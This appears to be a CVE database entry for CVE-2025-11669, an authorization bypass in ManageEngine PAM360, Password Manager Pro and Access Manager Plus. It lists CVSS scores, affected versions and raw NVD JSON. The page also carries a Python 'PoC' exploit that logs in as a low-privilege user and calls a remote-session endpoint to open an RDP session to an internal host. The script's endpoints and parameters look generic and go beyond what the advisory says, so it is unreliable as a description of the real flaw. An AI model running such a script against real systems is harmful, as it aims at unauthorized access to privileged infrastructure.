Security Vulnerability Report
中文
CVE-2025-11669 CVSS 8.1 HIGH

CVE-2025-11669

Published: 2026-01-13 14:16:37
Last Modified: 2026-02-02 15:42:06
Source: 0fc0942c-577d-436f-ae8e-945763c79b02

Description

Zohocorp ManageEngine PAM360 versions before 8202; Password Manager Pro versions before 13221; Access Manager Plus versions prior to 4401 are vulnerable to an authorization issue in the initiate remote session functionality.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:zohocorp:manageengine_pam360:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:zohocorp:manageengine_pam360:8.2:build8200:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:zohocorp:manageengine_pam360:8.2:build8201:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:zohocorp:manageengine_access_manager_plus:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:zohocorp:manageengine_access_manager_plus:4.4:build4400:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:zohocorp:manageengine_password_manager_pro:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:zohocorp:manageengine_password_manager_pro:13.2:build13200:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:zohocorp:manageengine_password_manager_pro:13.2:build13210:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:zohocorp:manageengine_password_manager_pro:13.2:build13220:*:*:-:*:*:* - VULNERABLE
ManageEngine PAM360 < 8202
Password Manager Pro < 13221
Access Manager Plus < 4401

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11669 PoC - ManageEngine Remote Session Authorization Bypass # This PoC demonstrates the authorization bypass in initiate remote session functionality import requests import json TARGET_URL = "https://target-manageengine.com" CVE_ID = "CVE-2025-11669" def exploit_authorization_bypass(): """ Exploit for CVE-2025-11669: Authorization bypass in remote session functionality Affects: PAM360 < 8202, Password Manager Pro < 13221, Access Manager Plus < 4401 """ # Step 1: Authenticate with low-privilege account login_url = f"{TARGET_URL}/api/auth/login" credentials = { "username": "low_priv_user", "password": "password123" } session = requests.Session() login_response = session.post(login_url, json=credentials) if login_response.status_code != 200: print(f"[-] Authentication failed") return False print(f"[+] Authenticated successfully with low-privilege account") # Step 2: Exploit authorization bypass to initiate remote session # This endpoint should require admin privileges but doesn't validate properly exploit_url = f"{TARGET_URL}/api/remote-session/initiate" exploit_payload = { "target_host": "internal-server.target.local", "session_type": "remote_access", "protocol": "RDP", "resource_id": "SENSITIVE_RESOURCE_ID" } exploit_response = session.post(exploit_url, json=exploit_payload) if exploit_response.status_code == 200: print(f"[+] Authorization bypass successful!") print(f"[+] Remote session initiated: {exploit_response.json()}") return True else: print(f"[-] Exploit failed with status: {exploit_response.status_code}") return False if __name__ == "__main__": print(f"[*] Testing {CVE_ID}") exploit_authorization_bypass()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11669", "sourceIdentifier": "0fc0942c-577d-436f-ae8e-945763c79b02", "published": "2026-01-13T14:16:37.160", "lastModified": "2026-02-02T15:42:06.170", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Zohocorp ManageEngine PAM360 versions before 8202; Password Manager Pro versions before 13221; Access Manager Plus versions prior to 4401 are vulnerable to an authorization issue in the initiate remote session functionality."}, {"lang": "es", "value": "Las versiones de Zohocorp ManageEngine PAM360 anteriores a la 8202; las versiones de Password Manager Pro anteriores a la 13221; y las versiones de Access Manager Plus anteriores a la 4401 son vulnerables a un problema de autorización en la funcionalidad de iniciar sesión remota."}], "metrics": {"cvssMetricV31": [{"source": "0fc0942c-577d-436f-ae8e-945763c79b02", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "0fc0942c-577d-436f-ae8e-945763c79b02", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_pam360:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.2", "matchCriteriaId": "CF414A47-847B-4423-85BA-3BE7721CB631"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_pam360:8.2:build8200:*:*:*:*:*:*", "matchCriteriaId": "F1942CE8-BDBD-4C8B-A1A5-BC343A403EF6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_pam360:8.2:build8201:*:*:*:*:*:*", "matchCriteriaId": "C03FD6F2-1C37-4EDE-925C-2793DEA837D2"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_access_manager_plus:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.4", "matchCriteriaId": "978659AB-47FC-4067-9D69-FAE21D87AE76"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_access_manager_plus:4.4:build4400:*:*:*:*:*:*", "matchCriteriaId": "20880A1B-E33E-4028-935B-F6308397270D"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_password_manager_pro:*:*:*:*:-:*:*:*", "versionEndExcluding": "13.2", "matchCriteriaId": "3F6A6153-F358-4D49-9C30-50E418346769"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_password_manager_pro:13.2:build13200:*:*:-:*:*:*", "matchCriteriaId": "A7B3FD1F-E984-4BF5-BFDE-A4F8DF8D3252"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_password_manager_pro:13.2:build13210:*:*:-:*:*:*", "matchCriteriaId": "83144A70-3F05-427B-84BD-6D68575812B0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_password_manager_pro:13.2:build13220:*:*:-:*:*:*", "matchCriteriaId": "5FFFD4D0-0A63-4915-9BC6-016B3FA0BE98"}]}]}], "references": [{"url": "https://www.manageengine.com/privileged-access-management/advisory/cve-2025-11669.html", "source": "0fc0942c-577d-436f-ae8e-945763c79b02", "tags": ["Patch", "Vendor Advisory"]}]}}